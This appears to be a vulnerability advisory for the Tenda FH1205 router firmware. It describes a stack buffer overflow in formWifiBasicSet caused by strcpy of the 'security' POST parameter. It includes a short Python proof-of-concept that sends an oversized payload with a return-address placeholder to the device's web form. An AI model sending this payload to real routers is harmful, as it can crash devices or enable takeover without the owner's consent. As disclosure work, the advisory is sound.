Skip to content

Latest commit

 

History

History
41 lines (28 loc) · 1.48 KB

formWifiBasicSet_security.md

File metadata and controls

41 lines (28 loc) · 1.48 KB
Raw

Overview

Affected version

FH1205 V2.0.0.7(775)

Vulnerability details

The Tenda FH1205 V2.0.0.7(775) firmware has a stack overflow vulnerability in the formWifiBasicSet function. The v30 variable receives the security parameter from a POST request and is later assigned to the v33 variable, which is fixed at 256 bytes. However, since the user can control the input of security, the statement strcpy(v33, v30); can cause a buffer overflow. The user-provided security can exceed the capacity of the v33 array, triggering this security vulnerability.

image-20240319221819491

image-20240319221952603

image-20240319222011509

PoC

import requests
from pwn import *

url = 'http://192.168.84.101/goform/WifiBasicSet'
payload = b'a' * 500 + p32(0xdeadbeef)
data = {
    'security_5g':'1', 
    'hideSsid':'1', 
    'ssid':'1',
    'security':payload, 
    'wrlPwd':'1', 
    'hideSsid_5g':'1', 
    'ssid_5g':'1', 
    'wrlPwd_5g': '1'
}

requests.post(url, data=data)

image-20240304213056127